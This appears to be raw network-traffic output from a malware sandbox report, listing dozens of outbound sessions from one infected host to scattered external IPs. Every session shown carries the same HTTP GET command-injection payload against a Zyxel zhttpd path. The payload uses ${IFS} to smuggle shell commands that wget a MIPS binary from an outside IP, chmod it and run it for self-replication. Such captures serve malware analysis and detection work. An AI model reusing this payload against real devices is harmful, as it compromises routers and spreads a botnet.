                                            Feb 2, 2024 06:21:06.501777887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2733192.168.2.1541006132.61.229.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501825094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2734192.168.2.1558068160.151.37.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501878023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2735192.168.2.1546342122.148.206.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501915932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2736192.168.2.1534022208.104.198.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501948118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2737192.168.2.154093641.229.144.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.501977921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2738192.168.2.1556800194.67.30.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502027988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2739192.168.2.154347227.69.69.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502074957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2740192.168.2.154066297.29.253.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502115011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2741192.168.2.1549564122.235.178.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502170086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2742192.168.2.1542632194.10.208.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502202988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2743192.168.2.153513448.12.65.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502232075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2744192.168.2.1549780170.243.136.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502254963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2745192.168.2.1555574126.156.217.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502289057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2746192.168.2.154010471.75.58.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502321005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2747192.168.2.1537706117.95.173.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502345085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2748192.168.2.1536248120.29.131.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502377033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2749192.168.2.154395418.233.61.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502418995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2750192.168.2.1536468152.226.172.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502473116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2751192.168.2.153818442.116.249.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502500057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2752192.168.2.154518225.142.24.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502528906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2753192.168.2.154790834.136.24.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502574921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2754192.168.2.1559800213.56.146.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502614021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2755192.168.2.1555986104.99.73.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502644062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2756192.168.2.155924493.247.44.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502669096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2757192.168.2.153819288.49.114.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502722025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2758192.168.2.153523031.2.210.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502749920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2759192.168.2.1541436223.99.64.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502785921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2760192.168.2.154880844.41.202.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502816916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2761192.168.2.1533064209.98.177.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502887011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2762192.168.2.155084817.130.194.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502929926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2763192.168.2.154802047.117.76.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502964973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2764192.168.2.15509244.190.83.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.502993107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2765192.168.2.1534264103.250.67.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503027916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2766192.168.2.1536580196.138.60.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503062963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2767192.168.2.153344423.98.127.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503122091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2768192.168.2.1556388101.223.65.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503153086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2769192.168.2.1543046181.17.139.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503181934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2770192.168.2.1539478207.200.14.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503231049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2771192.168.2.153393232.176.119.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503287077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2772192.168.2.1554890123.148.118.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503318071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2773192.168.2.1540940110.72.37.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503351927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2774192.168.2.1547948196.179.168.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503405094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2775192.168.2.155192484.88.115.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503449917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2776192.168.2.155450895.186.226.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503489017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2777192.168.2.1551912170.200.50.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503530025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2778192.168.2.155635874.32.134.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503561020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2779192.168.2.1546768121.242.35.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503592014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2780192.168.2.155039680.236.99.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503623962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2781192.168.2.154136877.103.177.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503654957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2782192.168.2.1541542192.128.29.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503700018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2783192.168.2.155376858.122.189.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503751993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2784192.168.2.1546980151.52.67.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503773928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2785192.168.2.1551156112.128.3.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503827095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2786192.168.2.154530437.101.97.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503851891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2787192.168.2.154101489.237.198.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503905058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2788192.168.2.153376469.199.223.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503928900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2789192.168.2.1534250162.90.225.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503974915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2790192.168.2.1557914145.161.180.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.503995895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2791192.168.2.1536688220.89.207.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504122019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2792192.168.2.153982457.229.42.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504151106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2793192.168.2.1548470210.51.55.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504183054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2794192.168.2.1546704109.244.189.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504218102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2795192.168.2.155853057.98.212.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504252911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2796192.168.2.1555624114.132.203.135443
                                            TimestampBytes transferredDirectionData
